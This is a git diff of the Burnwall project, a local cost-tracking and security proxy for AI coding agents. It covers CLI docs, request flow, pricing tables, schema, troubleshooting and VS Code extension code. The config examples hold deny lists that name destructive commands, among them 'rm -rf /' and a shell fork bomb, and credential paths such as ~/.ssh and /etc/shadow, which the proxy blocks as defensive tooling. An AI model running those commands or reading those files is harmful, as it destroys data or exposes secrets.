-**Cache hit rate calculation:** -``` -cache_hit_rate = cache_read_tokens / (cache_read_tokens + input_tokens + cache_creation_tokens) -``` - -**Cache savings calculation:** -``` -savings = (cache_read_tokens × base_input_price) - (cache_read_tokens × cache_read_price) -``` - -### `burnwall history [--days N]` - -Show historical spend. Default: 7 days. - -``` -$ burnwall history - -📅 Last 7 days - Date Cost Requests Cache Blocked - ──────────────────────────────────────────────────── - May 11 $12.47 84 73% 2 - May 10 $28.91 156 68% 0 - May 9 $7.23 41 82% 1 - May 8 $45.02 203 45% 5 - May 7 $19.88 98 71% 0 - May 6 $31.44 167 62% 3 - May 5 $22.10 121 77% 1 - ──────────────────────────────────────────────────── - Total $167.05 870 avg 68% 12 - - Estimated monthly (at this rate): $715.93 -``` - -Flags: -- `--days N` — show N days (default 7) -- `--json` — output as JSON -- `--model` — break down by model per day - -### `burnwall metrics [--days N] [--json]` - -Per-model latency percentiles, error rate, and throughput — computed locally -from the request log. The local answer to hosted LLM observability. Metadata -only; never reads prompt content. Default window: 7 days. - -``` -$ burnwall metrics - -📈 Latency & reliability (last 7 days) - - Provider / Model Reqs Errs p50 p95 Err% Req/day - ────────────────────────────────────────────────────────────────────────────────── - anthropic/claude-sonnet-4-6 428 3 842ms 3180ms 0.7% 61.1 - openai/gpt-5.4 96 5 510ms 1920ms 5.2% 13.7 - google/gemini-2.5-pro 140 0 690ms 2450ms 0.0% 20.0 -``` - -**Data source:** per-request upstream latency (ms) and HTTP status recorded on -the response path. `p50`/`p95` are percentiles over latency samples in the -window; `Err%` is the share of requests with a 4xx/5xx status; `Req/day` is the -request count divided by the window in days. Empty window prints a hint to route -a request through the proxy first. - -Flags: -- `--days N` — window in days (default 7, floored at 1) -- `--json` — emit `{ "days", "models": [ { provider, model, requests, errors, - error_rate, p50_ms, p95_ms, throughput_per_day } ] }` - -### `burnwall digest [--days N] [--json]` - -An Agent Bill of Materials for a window: which models ran and what they cost, -which MCP servers/tools were touched, how many tool calls were made, which -security checks fired, and total turns. Assembled entirely from existing -metadata rows — never reads prompt content. Default window: 7 days. - -``` -$ burnwall digest - -🧾 Agent Bill of Materials (last 7 days) - - Turns: 664 requests (8 blocked) - Total cost: $241.07 - - Models: - anthropic/claude-sonnet-4-6 428 req $198.40 - openai/gpt-5.4 96 req $31.22 - google/gemini-2.5-pro 140 req $11.45 - - MCP tool calls: 52 (4 distinct tools) - MCP tools advertised: - filesystem/read_file (approved) - filesystem/write_file (pending) - - Security checks fired: 8 - path_blocked: 6 - secret_detected: 2 - Distinct targets touched: 5 -``` - -Flags: -- `--days N` — window in days (default 7) -- `--json` — emit the same structure as the table (days, turns, blocked, - total_cost_usd, models, mcp_tool_calls, distinct_mcp_tools, mcp_tools, - security_by_type, distinct_targets) - -### `burnwall report [--days N] [--format text|json|csv]` - -A shareable period summary (default window: 30 days): spend, request/blocked -activity, top models by cost, and security blocks by type. Built from the same -metadata as `digest`; never reads prompt content. `--format csv` emits the -per-model spend rows; `--format json` the full structure. - -### `burnwall audit ` - -Cryptographic audit receipts and compliance exports (all metadata only). - -- `burnwall audit seal` — walk the request + security-event logs and append, in - chronological order, a signed link in a hash chain for each not-yet-sealed - action. Each receipt stores a SHA-256 of the source row's canonical contents - (`content_hash`), chained as `hash = SHA-256(prev_hash ‖ content_hash)`, and - signed with a local Ed25519 key at `~/.burnwall/audit_ed25519.key` (generated - 0600 on first use). Idempotent — already-sealed rows are skipped. -- `burnwall audit verify` — re-walk the chain: check every hash link, re-derive - each `content_hash` from the live source row, and verify each Ed25519 - signature. Prints the public key. Exits non-zero if the chain is tampered - (a receipt or a sealed row was edited, deleted, or reordered). -- `burnwall audit export [--format json|csv]` — dump the receipt log. -- `burnwall audit aibom [--days N]` — export a CycloneDX 1.6 AI Bill of - Materials for the window (models as components, MCP servers as services). -- `burnwall audit sarif [--days N]` — export security blocks as SARIF 2.1.0 - for GitHub code scanning. - -``` -$ burnwall audit seal -🔏 Sealed 2 new receipts into the audit chain. - Public key: 85369a5c3c6f586823d45c9d182e1e177598dae37b0c7791f65c1aa7cb68bec7 - -$ burnwall audit verify -✅ Audit chain intact — 2 receipts verified. - Public key: 85369a5c3c6f586823d45c9d182e1e177598dae37b0c7791f65c1aa7cb68bec7 -``` - -### `burnwall rules` — signed remote packs (v0.9) - -In addition to bundled official packs and local third-party packs (TOFU), rule -packs can be fetched from a URL when signed by a trusted publisher: - -- `burnwall rules keygen ` — generate an Ed25519 publisher keypair - (writes the secret seed `0600`; prints the public key to share). -- `burnwall rules sign --key [--out ]` — produce a - detached hex signature over the pack. -- `burnwall rules verify --sig [--publisher ]` — verify a - pack's signature against `[rules].publishers` (and any `--publisher` keys). -- `burnwall rules fetch [--sig ] [--publisher ] [--yes]` — - download a pack + its signature, verify against trusted publishers, and - install it. **A remote pack is installed only if its signature verifies**, and - it is still parsed under the deny-only / append-only invariants — it can only - add restrictions, never loosen them. Trusted publisher keys live under - `[rules]` as `publishers = [{ name = "...", key = "" }]`. - -### Editor extension (VS Code / Cursor / Windsurf / VSCodium) - -`editor/vscode/` is a separate TypeScript extension that shows today's spend, -cache hit rate, and blocked-request count in the status bar by shelling out to -`burnwall status --json`. It reads only the local CLI output — no network, no -direct database access. See `editor/vscode/README.md`. - -### `burnwall config set ` - -Set configuration values. - -``` -$ burnwall config set budget.daily 20 -✅ Daily budget set to $20.00 - -$ burnwall config set security.deny_paths "~/.ssh,~/.aws,~/.gnupg" -✅ Deny paths updated (3 entries) - -$ burnwall config set security.deny_commands "rm -rf,chmod 777" -✅ Deny commands updated (2 entries) -``` - -### `burnwall config show` - -Show current configuration. - -``` -$ burnwall config show - -[proxy] -port = 4100 -host = "127.0.0.1" - -[budget] -daily = 50.0 -warn_percent = 80 - -[security] -deny_paths = ["~/.ssh", "~/.aws", "~/.gnupg", "~/.kube"] -deny_commands = ["rm -rf /", "chmod 777"] -detect_secrets = true -block_network_mounts = true - -[loop_detection] -enabled = true -max_identical_requests = 5 -window_seconds = 300 -max_cost_per_window = 2.0 -``` - ---- - -## Proxy Behavior - -### Request Flow (detailed) - -``` -1. RECEIVE request from AI tool on localhost:4100 -2. IDENTIFY provider from URL path: - /anthropic/* → Anthropic Messages API - /openai/* → OpenAI Chat Completions API - /google/* → Google Gemini API (generateContent) -3. SECURITY CHECK (request body): - a. Parse JSON body - b. Scan for tool_use / function_call blocks - c. For each tool call: - - Check file paths against deny_paths list - - Check commands against deny_commands list - - Check for network mount paths (/Volumes/, \\, smb://, nfs://) - - Check for secret patterns (AWS keys, API tokens, private keys) - d. If ANY rule matches: - - Return HTTP 403 with JSON error body: - {"error": {"type": "security_blocked", "message": "Burnwall blocked: attempted read of ~/.ssh/id_rsa"}} - - Log blocked event to SQLite - - Print warning to terminal: 🛡️ BLOCKED: ... - - Do NOT forward the request -4. BUDGET CHECK: - a. Query today's total spend from SQLite - b. If >= daily_limit: - - Return HTTP 429 with JSON error body: - {"error": {"type": "budget_exceeded", "message": "Daily budget of $20.00 exceeded ($20.47 spent)"}} - - Log event - - Print warning: 💰 BUDGET EXCEEDED: ... - c. If >= warn_percent of daily_limit: - - Print warning: ⚠️ Budget 85% used ($17.02/$20.00) - - Still forward the request -5. FORWARD request to real provider: - a. Rewrite URL: strip /anthropic, /openai, or /google prefix - b. Forward all headers unchanged (including auth) - c. Forward body unchanged - d. For streaming (SSE) responses: pipe through, parse final usage chunk - e. For non-streaming: buffer response, parse usage - f. [v0.7] If `[resilience]` is enabled and the upstream is unreachable or - returns 5xx, retry the SAME request against the next configured endpoint - for that provider (skipping endpoints whose circuit breaker is open). - The request shape is identical — a transparent reroute, not a translation. -6. PARSE response usage block: - a. Extract token counts by type (input, cached, output, cache_write) - b. Look up model in pricing database - c. Calculate real cost with cache-aware pricing -7. LOOP DETECTION [v0.2]: - a. Hash first 200 chars of request content - b. Check if same hash appeared N+ times in last M seconds - c. If loop detected: block with 429, exponential backoff -8. STORE in SQLite: - - timestamp, provider, model, input_tokens, cache_creation_tokens, - cache_read_tokens, output_tokens, cost_usd, blocked (bool), - block_reason, session_id (from request header if available) - - [v0.7] upstream latency (ms) and HTTP status — metadata only, feeds - `burnwall metrics`. If `[observability].otel_spans` is on, also emit one - OpenTelemetry GenAI span (`gen_ai.*`) as a line of JSON to `otel_file`. -9. RETURN response unchanged to AI tool -``` - -### Streaming (SSE) Handling - -Many AI tools use streaming responses (`stream: true`). The proxy must: -1. Forward SSE chunks as they arrive (don't buffer the whole response) -2. Parse the FINAL chunk which contains the usage block -3. Calculate cost from the final usage block -4. Log to SQLite after the stream completes - -For Anthropic streaming, the usage is in the `message_delta` event with `stop_reason`. -For OpenAI streaming, usage is in the final chunk when `stream_options.include_usage` is set, or must be estimated from token counting. - -### Error Handling - -- If request body is not valid JSON → forward anyway (might be a non-chat endpoint) -- If response parsing fails → log error, still return response unchanged -- If SQLite write fails → log error, don't crash, keep proxying -- If upstream provider is unreachable → return 502 with helpful message - (with `[resilience]` enabled, only after every configured endpoint for that - provider has failed or has an open circuit) -- If upstream returns error → forward error unchanged, still log the attempt - ---- - -## Pricing Database - -### Anthropic Models (as of May 2026) - -| Model | Input ($/MTok) | Cache Write ($/MTok) | Cache Read ($/MTok) | Output ($/MTok) | -|-------|---------------|---------------------|--------------------|-----------------| -| claude-opus-4-7 | 5.00 | 6.25 (1.25x) | 0.50 (0.10x) | 25.00 | -| claude-opus-4-6 | 5.00 | 6.25 (1.25x) | 0.50 (0.10x) | 25.00 | -| claude-sonnet-4-6 | 3.00 | 3.75 (1.25x) | 0.30 (0.10x) | 15.00 | -| claude-haiku-4-5 | 1.00 | 1.25 (1.25x) | 0.10 (0.10x) | 5.00 | - -Note: 1-hour cache duration is 2x base input (instead of 1.25x). Detect from cache_control in request. - -### OpenAI Models (as of May 2026) - -| Model | Input ($/MTok) | Cached Input ($/MTok) | Output ($/MTok) | -|-------|---------------|-----------------------|-----------------| -| gpt-5.5 | 2.00 | 1.00 (0.50x) | 10.00 | -| gpt-5.4 | 1.25 | 0.625 (0.50x) | 10.00 | -| gpt-5.4-mini | 0.15 | 0.075 (0.50x) | 0.60 | - -Note: OpenAI caching is automatic (50% discount on cached tokens). No write premium. - -### Google Gemini Models (as of May 2026) - -| Model | Input ($/MTok) | Cached Input ($/MTok) | Output ($/MTok) | -|-------|---------------|-----------------------|-----------------| -| gemini-2.5-pro | 1.25 | 0.3125 (0.25x) | 10.00 | -| gemini-2.5-flash | 0.30 | 0.075 (0.25x) | 2.50 | -| gemini-2.0-flash | 0.10 | 0.025 (0.25x) | 0.40 | - -Note: Gemini caching is implicit — there is no cache-write cost on the response -path. Token accounting comes from `usageMetadata` (the cached-content split is -read from `cachedContentTokenCount`; thinking tokens fold into output). - -### Pricing Update Strategy - -Prices are embedded in the binary as a TOML file. Users can override with a local -`~/.burnwall/pricing.toml` file. We publish pricing updates as new releases. -The `burnwall status` command shows a warning if pricing data is >30 days old. - -### Pricing Notes - -- **OpenAI caching is automatic** (no opt-in). Cached tokens are 50% of the base input price (not 90% like Anthropic). -- **Anthropic has two cache durations:** 5-min (1.25× write) and 1-hour (2× write). Reads are 0.1× base for both. -- **Cache multipliers stack with Batch API discounts** — apply Batch discount on top of cached-token rate. -- **Opus 4.7 shipped a new tokenizer** that produces up to 35% more tokens for the same text. Same per-token price, but higher effective cost — a stealth price increase versus Opus 4.6. -- **Warning:** `pricing.toml` should be checked monthly. The CLI must show a warning if pricing data is >30 days old (see Pricing Update Strategy above). - ---- - -## SQLite Schema - -```sql -CREATE TABLE IF NOT EXISTS requests ( - id INTEGER PRIMARY KEY AUTOINCREMENT, - timestamp TEXT NOT NULL DEFAULT (datetime('now')), - provider TEXT NOT NULL, -- 'anthropic', 'openai', 'google' - model TEXT NOT NULL, -- 'claude-sonnet-4-6', 'gpt-5.4', etc. - input_tokens INTEGER NOT NULL DEFAULT 0, - cache_creation_tokens INTEGER NOT NULL DEFAULT 0, - cache_read_tokens INTEGER NOT NULL DEFAULT 0, - output_tokens INTEGER NOT NULL DEFAULT 0, - cost_usd REAL NOT NULL DEFAULT 0.0, - blocked INTEGER NOT NULL DEFAULT 0, -- boolean: 0 or 1 - block_reason TEXT, -- null if not blocked - session_id TEXT, -- from request headers if available - request_hash TEXT -- [v0.2] for loop detection -); - -CREATE INDEX IF NOT EXISTS idx_requests_timestamp ON requests(timestamp); -CREATE INDEX IF NOT EXISTS idx_requests_provider_model ON requests(provider, model); -CREATE INDEX IF NOT EXISTS idx_requests_blocked ON requests(blocked); - -CREATE TABLE IF NOT EXISTS security_events ( - id INTEGER PRIMARY KEY AUTOINCREMENT, - timestamp TEXT NOT NULL DEFAULT (datetime('now')), - event_type TEXT NOT NULL, -- 'path_blocked', 'command_blocked', 'secret_detected', 'mount_blocked' - details TEXT NOT NULL, -- what was blocked (path, command, etc.) - provider TEXT, - model TEXT -); - -CREATE TABLE IF NOT EXISTS daily_summary ( - date TEXT PRIMARY KEY, -- 'YYYY-MM-DD' - total_cost REAL NOT NULL DEFAULT 0.0, - total_requests INTEGER NOT NULL DEFAULT 0, - total_blocked INTEGER NOT NULL DEFAULT 0, - cache_savings REAL NOT NULL DEFAULT 0.0, - updated_at TEXT NOT NULL DEFAULT (datetime('now')) -); -``` - ---- - -## Config File Format - -Location: `~/.burnwall/config.toml` - -```toml -[proxy] -port = 4100 -host = "127.0.0.1" - -[budget] -daily = 50.0 # dollars -monthly = 0.0 # 0 = no monthly limit -warn_percent = 80 # warn at this % of daily limit - -[security] -enabled = true -deny_paths = [ - "~/.ssh", - "~/.aws", - "~/.gnupg", - "~/.kube", - "~/.config/gcloud", - "/etc/passwd", - "/etc/shadow", -] -deny_commands = [ - "rm -rf /", - "rm -rf ~", - "chmod 777", - ":(){ :|:& };:", -] -block_network_mounts = true # block /Volumes/*, \\server\share, smb://, nfs:// -detect_secrets = true # scan for API keys, private keys in outbound payloads -dlp = false # opt-in egress check: Luhn-valid card numbers, US SSNs - -[loop_detection] -enabled = true -max_identical_requests = 5 # same hash N times in window → block -window_seconds = 300 # 5 minute window -max_cost_per_window = 2.0 # $2 in 5 min → flag as loop - -[logging] -level = "info" # trace, debug, info, warn, error -file = "~/.burnwall/burnwall.log" - -[mcp] -require_approval = false # enforce: block tools/call to unapproved tools - -# One watcher can front several MCP servers, routed by the first path -# segment (`//...` → that server's upstream, prefix stripped). -[[mcp.servers]] -name = "filesystem" -upstream = "http://localhost:8090" - -[resilience] -enabled = false # off by default: single upstream, verbatim 5xx -failure_threshold = 3 # consecutive failures before a circuit opens -cooldown_seconds = 30 # how long an open circuit stays open before a probe - -# Per-provider ordered fallback endpoints. The primary upstream is tried first; -# these are tried after it, in order, on a connection error or 5xx. -[[resilience.endpoints]] -provider = "anthropic" # 'anthropic' | 'openai' | 'google' -urls = ["https://bedrock.example.com"] - -[observability] -otel_spans = false # emit one OTel GenAI span per request (file-only) -otel_file = "" # span file; empty → /otel-spans.jsonl -``` - -`burnwall mcp` manages the MCP tool-approval workflow and audit log: - -- `burnwall mcp list [--json]` — every `(server, tool)` seen, with its approval - state (`pending` / `approved`). -- `burnwall mcp approve [tool]` — approve one tool, or every tool of a - server. In enforce mode a `tools/call` to a tool that is not approved is held - with a 403 until you approve it; a tool whose definition later changes is - reset to `pending` automatically. -- `burnwall mcp revoke [tool]` — return a tool (or a server) to - `pending`. -- `burnwall mcp export [--days N] [--format json|csv]` — portable record of MCP - tool-call activity and MCP-side security events. - ---- - -## v0.2 Additions (Week 3-4) - -- Loop detection (request content hashing, exponential backoff) -- `burnwall security` command to view blocked attempts -- Security profile YAML files per project: - ```yaml - # .burnwall.yaml in project root - allow_paths: - - ./src - - ./tests - deny_paths: - - ./secrets - - ./.env - budget: - daily_max_usd: 10 - ``` - - diff --git a/docs/TROUBLESHOOTING.md b/docs/TROUBLESHOOTING.md new file mode 100644 index 0000000..b47f0f1 --- /dev/null +++ b/docs/TROUBLESHOOTING.md @@ -0,0 +1,101 @@ +# Troubleshooting + +Burnwall is local-only and stores zero telemetry, so it can't phone home and we +can't see your machine. Instead, every problem has a command that explains +itself. Start here: + +```bash +burnwall doctor # one-glance health check + the fix for what's wrong +``` + +If you're about to file a bug, attach a redacted, metadata-only bundle (it's +self-scanned for secrets before it's written, and nothing is sent anywhere): + +```bash +burnwall doctor --export +``` + +--- + +## Symptom → fix + +| Symptom | What it means | Do this | +|---|---|---| +| Requests fail with **connection refused** | Your tool is routed at the proxy, but the proxy isn't answering on that port | `burnwall recover` to get unstuck now, then `burnwall start`. Open a **new shell** so it re-routes. | +| Status line says **`DIRECT (unprotected)`** | This shell isn't routed through Burnwall — traffic is going straight to the provider with no scanning or cost capture | `burnwall doctor` — it tells you whether that's a misconfiguration or your own choice, and the exact fix | +| Status line says **`DIRECT (unprotected) — run burnwall doctor`** | Routing **is** configured, but this shell fell through to direct (the proxy was down when the shell launched, or the shell predates routing) | `burnwall doctor --fix` (starts the proxy if it's down), then open a **new shell** | +| Status line says **`PROXY DOWN`** | This shell is routed, but the proxy process died | `burnwall start`, then check `burnwall status` | +| Status line says **`PAUSED (unprotected)`** | You ran `burnwall pause` — everything relays unchecked until the window ends | `burnwall resume` to restore protection now (it also auto-expires) | +| A request was **unexpectedly blocked** (403 / an `x-burnwall-blocked` header) | A security rule matched the tool call before it left your machine | `burnwall security --days 7` to find the event id, then `burnwall explain `. If it's a false positive: `burnwall allow-once`. See [RULES.md](RULES.md). | +| **Numbers look wrong**, or you want your data elsewhere | — | `burnwall export --format csv` (or `json`) — your rows, on your machine | +| Status line **tokens/context don't move** while your agent runs sub-agents | Expected — see ["Tokens freeze during sub-agents"](#tokens-freeze-during-sub-agents) below | Nothing to fix; the plan/cost segments still track the real traffic | +| **Pricing looks stale** | The bundled rate card is old | Upgrade Burnwall (`burnwall upgrade`); `burnwall doctor` warns when pricing is >30 days old | + +--- + +## "Running, but unprotected" + +The most confusing state is a configured-but-unprotected one: you set up +routing, yet a shell is going direct. There are two causes, and Burnwall tells +them apart so it only nags when it's actually a problem: + +- **Unintended** — routing is enabled, but the proxy was down when this shell + started (so the env didn't route), or the shell predates routing. + `burnwall doctor` reports this as `⚠ UNPROTECTED`, and `burnwall doctor --fix` + starts the proxy when that's the issue. +- **By choice** — you ran `burnwall disable-routing`, or never set routing up. + `burnwall doctor` reports this as a `•` note, **not** a warning, and `--fix` + will not override it — it just tells you the command to turn protection back + on (`burnwall enable-routing`). + +One thing no command can do for you: environment variables are fixed when a +shell launches, so a shell that started unprotected stays unprotected until you +open a **new** one (or restart your AI tool). `burnwall doctor` says so rather +than pretend otherwise. + +--- + +## Tokens freeze during sub-agents + +When your AI tool spins up sub-agents, the status line's token counters (`↑ ↓`) +and context gauge (`ctx`) stop moving until the sub-agents finish. That's +correct, not a bug: + +- Those two segments come from **the tool's own report of your main + conversation** — and your conversation genuinely isn't growing while a + sub-agent works in its own, separate context window. The `ctx` gauge answers + "how full is *my* conversation" (the number you act on when deciding to + compact), so it must not count sub-agent context. +- The traffic is still fully metered and scanned: every sub-agent API call goes + through the proxy, so the **plan headroom (`5h`/`7d`), spend, and block + count keep moving** — that's your live signal that work is happening. +- Surfaces fed from the database rather than the tool (`burnwall watch`, the + editor status bar) don't freeze at all. + +--- + +## Where your data lives + +Everything is local, in a single directory under your home: + +``` +~/.burnwall/ + burnwall.db # all metadata: cost, tokens, security events (one SQLite file) + config.toml # your settings +``` + +- **Back up** by copying `burnwall.db` — that one file is your whole history. +- **Export** a portable copy with `burnwall export --format csv|json`. +- The database holds **metadata only** — model, tokens, cost, timestamps, and + redacted security-event matches. No prompt content, no API keys. + +--- + +## Filing a bug + +1. Reproduce the problem. +2. Run `burnwall doctor --export`. It writes a redacted, metadata-only bundle and + self-scans it for secrets before writing — if anything secret-shaped survived, + it refuses to write rather than risk a leak. +3. Review the file (it's plain text), then attach it to a new issue. The bug + report template asks for it up front. diff --git a/editor/vscode/package.json b/editor/vscode/package.json index 5f5437d..c137b9c 100644 --- a/editor/vscode/package.json +++ b/editor/vscode/package.json @@ -2,7 +2,7 @@ "name": "burnwall", "displayName": "Burnwall", "description": "Cost + security for your AI coding agents, at a glance — reads your local Burnwall CLI.", - "version": "0.9.2", + "version": "0.11.0", "publisher": "intbot", "license": "FSL-1.1-MIT", "repository": { "type": "git", "url": "https://github.com/intbot/burnwall" }, diff --git a/editor/vscode/src/format.ts b/editor/vscode/src/format.ts index b4b8ad4..57971c4 100644 --- a/editor/vscode/src/format.ts +++ b/editor/vscode/src/format.ts @@ -6,6 +6,8 @@ export interface StatusJson { total_cost_usd?: number; combined_total_usd?: number; + proxy_running?: boolean; + env_routing?: string; blocked_requests?: number; security_events?: number; budget?: { daily_limit_usd?: number; spent_today_usd?: number }; @@ -14,6 +16,40 @@ export interface StatusJson { cache_creation_tokens?: number; cache_read_tokens?: number; }>; + plan?: { + providers?: Array<{ + provider: string; + status: string; + windows: Array<{ label: string; utilization: number; reset_in_secs: number }>; + }>; + } | null; + coverage?: Array<{ + tool: string; + binary: string; + state: "protected" | "installed_not_seen" | "bypasses"; + seen_secs_ago?: number; + reason?: string; + }>; +} + +/** Coverage verdict for one installed tool. */ +export interface CoverageItem { + tool: string; + state: "protected" | "installed_not_seen" | "bypasses"; + seenSecsAgo: number | null; + reason: string | null; +} + +/** Subscription-plan limit headroom for one provider's binding window. */ +export interface PlanSummary { + provider: string; + primaryLabel: string; + /** 0..100. */ + primaryPct: number; + primaryResetInSecs: number; + secondaryLabel: string | null; + secondaryPct: number | null; + throttled: boolean; } export interface StatusSummary { @@ -24,10 +60,65 @@ export interface StatusSummary { securityEvents: number; /** Percent of the daily budget spent, or null when no daily limit is set. */ budgetPercent: number | null; + /** Subscription headroom (tightest binding window), or null for API usage. */ + plan: PlanSummary | null; + /** Per-tool coverage; empty when no supported tools are installed. */ + coverage: CoverageItem[]; + /** True when the env routes to the proxy but the proxy process is not + * running — every request from that environment will fail (U-C1). */ + proxyDown: boolean; +} + +/** "time until" label for a reset countdown: `45m`, `2h28m`, `2d7h`, `now`. */ +export function humanDuration(secs: number): string { + if (secs <= 0) { + return "now"; + } + const mins = Math.floor(secs / 60); + if (mins < 60) { + return `${mins}m`; + } + const hours = Math.floor(mins / 60); + if (hours < 24) { + return `${hours}h${String(mins % 60).padStart(2, "0")}m`; + } + return `${Math.floor(hours / 24)}d${hours % 24}h`; +} + +/** Pick the tightest binding window across all subscription providers. */ +function planSummary(s: StatusJson): PlanSummary | null { + const providers = s.plan?.providers ?? []; + let best: PlanSummary | null = null; + for (const prov of providers) { + const windows = prov.windows ?? []; + if (windows.length === 0) { + continue; + } + const primary = windows[0]; + const secondary = windows[1] ?? null; + const cand: PlanSummary = { + provider: prov.provider, + primaryLabel: primary.label, + primaryPct: primary.utilization * 100, + primaryResetInSecs: primary.reset_in_secs, + secondaryLabel: secondary ? secondary.label : null, + secondaryPct: secondary ? secondary.utilization * 100 : null, + // Only positively-throttling statuses — Anthropic emits warning-grade + // intermediates (`allowed_warning`) while requests still succeed (U-H4). + throttled: ["throttled", "rejected", "blocked", "rate_limited"].includes(prov.status), + }; + if (!best || cand.primaryPct > best.primaryPct) { + best = cand; + } + } + return best; } export function summarize(s: StatusJson): StatusSummary { - const costToday = s.combined_total_usd ?? s.total_cost_usd ?? 0; + // Headline figure: the proxied total. `combined_total_usd` is now deduped + // server-side (X4), but proxied spend is the number Burnwall can vouch for; + // the combined figure is detail for the panel, not the bar. + const costToday = s.total_cost_usd ?? s.combined_total_usd ?? 0; let cacheRead = 0; let promptTotal = 0; @@ -44,17 +135,56 @@ export function summarize(s: StatusJson): StatusSummary { const spent = s.budget?.spent_today_usd ?? costToday; const budgetPercent = limit > 0 ? (spent / limit) * 100 : null; + const coverage: CoverageItem[] = (s.coverage ?? []).map((c) => ({ + tool: c.tool, + state: c.state, + seenSecsAgo: c.seen_secs_ago ?? null, + reason: c.reason ?? null, + })); + return { costToday, cacheHitRate, blocked: s.blocked_requests ?? 0, securityEvents: s.security_events ?? 0, budgetPercent, + plan: planSummary(s), + coverage, + proxyDown: s.env_routing === "proxied" && s.proxy_running === false, }; } -/** One-line status-bar label (VS Code `$(icon)` codicons allowed). */ +/** One-line status-bar label (VS Code `$(icon)` codicons allowed). On a + * subscription, dollars are notional, so the binding limit window leads instead. */ export function statusBarText(s: StatusSummary): string { + // Routed at a dead proxy beats every other message: the user's tools are + // actively failing with connection-refused right now (U-C1). + if (s.proxyDown) { + return "$(error) Burnwall proxy DOWN — run `burnwall start`"; + } + const bypassed = s.coverage.filter((c) => c.state === "bypasses"); + const bypassPart = + bypassed.length > 0 + ? `$(warning) ${bypassed.map((c) => c.tool).join(", ")} unprotected` + : null; + if (s.plan) { + const p = s.plan; + const parts = [ + `$(flame) ${p.primaryLabel} ${Math.round(p.primaryPct)}% (${humanDuration( + p.primaryResetInSecs, + )})`, + ]; + if (p.throttled) { + parts.push("$(warning) throttled"); + } + if (s.blocked > 0) { + parts.push(`$(shield) ${s.blocked}`); + } + if (bypassPart) { + parts.push(bypassPart); + } + return parts.join(" · "); + } const parts = [`$(flame) $${s.costToday.toFixed(2)}`]; if (s.cacheHitRate !== null) { parts.push(`cache ${Math.round(s.cacheHitRate * 100)}%`); @@ -62,9 +192,26 @@ export function statusBarText(s: StatusSummary): string { if (s.blocked > 0) { parts.push(`$(shield) ${s.blocked}`); } + if (bypassPart) { + parts.push(bypassPart); + } return parts.join(" · "); } +/** Human-readable coverage line for the tooltip. */ +function coverageLine(c: CoverageItem): string { + switch (c.state) { + case "protected": + return ` ${c.tool}: protected${ + c.seenSecsAgo !== null ? ` (seen ${humanDuration(c.seenSecsAgo)} ago)` : "" + }`; + case "bypasses": + return ` ${c.tool}: NOT protected${c.reason ? ` — ${c.reason}` : ""}`; + default: + return ` ${c.tool}: installed, no traffic seen`; + } +} + export function tooltip(s: StatusSummary): string { const budgetLine = s.budgetPercent !== null @@ -74,14 +221,41 @@ export function tooltip(s: StatusSummary): string { s.cacheHitRate !== null ? `Cache hit rate: ${Math.round(s.cacheHitRate * 100)}%` : `Cache hit rate: n/a`; - return [ + // On a flat-rate plan the dollar figure is notional (API-equivalent), not a + // bill — label it so a subscriber doesn't read it as money owed. + const costLine = s.plan + ? `Cost: $${s.costToday.toFixed(2)} (notional — flat-rate plan)` + : `Cost: $${s.costToday.toFixed(2)}`; + const lines = [ "Burnwall — today", - `Cost: $${s.costToday.toFixed(2)}`, + costLine, budgetLine, cacheLine, `Blocked requests: ${s.blocked}`, `Security events: ${s.securityEvents}`, - "", - "Click for the full breakdown.", - ].join("\n"); + ]; + if (s.proxyDown) { + lines.splice(1, 0, "⛔ PROXY DOWN — tools routed here will fail to connect. Run `burnwall start`."); + } + if (s.plan) { + const p = s.plan; + lines.push( + "", + `Plan (${p.provider})${p.throttled ? " — THROTTLED" : ""}`, + `${p.primaryLabel}: ${Math.round(p.primaryPct)}% used, resets ${humanDuration( + p.primaryResetInSecs, + )}`, + ); + if (p.secondaryLabel !== null && p.secondaryPct !== null) { + lines.push(`${p.secondaryLabel}: ${Math.round(p.secondaryPct)}% used`); + } + } + if (s.coverage.length > 0) { + lines.push("", "Coverage (routes through Burnwall):"); + for (const c of s.coverage) { + lines.push(coverageLine(c)); + } + } + lines.push("", "Click for the full breakdown."); + return lines.join("\n"); } diff --git a/editor/vscode/src/panel_view.ts b/editor/vscode/src/panel_view.ts index d744847..9ed855c 100644 --- a/editor/vscode/src/panel_view.ts +++ b/editor/vscode/src/panel_view.ts @@ -1,6 +1,14 @@ // Pure view model for the Burnwall panel — no `vscode` import, so it is // unit-testable under plain Node (see test/panel.test.ts). The webview wiring // (which needs `vscode`) lives in panel.ts. +// +// Layout: "native stat cards" (Variant 1) — a header, a row of four stat tiles +// (Spend / Budget / Cache / Blocked) with delta-vs-yesterday chips and CSS +// bars, a pre-rendered static SVG spend trend, then a Cost-by-model table with +// share-of-spend bars and the security / MCP detail. Styled entirely with VS +// Code theme variables (`--vscode-*`) so it adapts to light, dark, and +// high-contrast themes, and rendered with NO scripts (the panel sets +// `enableScripts: false`) — the chart is a baked ``, not a charting lib. export interface Digest { total_cost_usd?: number; @@ -16,7 +24,21 @@ export interface Status { total_cost_usd?: number; blocked_requests?: number; security_events?: number; + /** Enforcement blocks vs advisory alerts — kept distinct so an alert is + * never shown as a block (mirrors the CLI's honest split). */ + security_blocked?: number; + security_alerts?: number; budget?: { daily_limit_usd?: number; spent_today_usd?: number }; + /** Per-model token rows, used to derive today's cache-hit rate. */ + breakdown?: Array<{ + input_tokens?: number; + cache_creation_tokens?: number; + cache_read_tokens?: number; + }>; + /** Dense daily-spend series (oldest → newest, zero-filled) for the SVG chart. */ + spend_series?: number[]; + /** Yesterday's baselines for the delta-vs-previous chips. */ + previous_day?: { cost_usd?: number; cache_hit_pct?: number; blocked?: number }; } function esc(s: unknown): string { @@ -30,50 +52,295 @@ function money(n: unknown): string { return `$${v.toFixed(2)}`; } +function num(n: unknown): number { + return typeof n === "number" && isFinite(n) ? n : 0; +} + +const GREEN = "var(--vscode-charts-green, #3fb950)"; +const RED = "var(--vscode-charts-red, #f85149)"; +const AMBER = "var(--vscode-charts-orange, #cc8a3a)"; +const MUTED = "var(--vscode-descriptionForeground)"; + +/** Theme-token colour for a "higher is worse" gauge (budget used). */ +function gaugeColor(pct: number): string { + if (pct < 60) return GREEN; + if (pct < 85) return "var(--vscode-charts-yellow, #d29922)"; + return RED; +} + +type Trend = "higherBetter" | "higherWorse"; + +/** Colour for a delta given its sign and the metric's polarity. */ +function deltaColor(positive: boolean, flat: boolean, trend: Trend): string { + if (flat) return MUTED; + if ((positive && trend === "higherBetter") || (!positive && trend === "higherWorse")) return GREEN; + if (positive && trend === "higherWorse") return AMBER; + 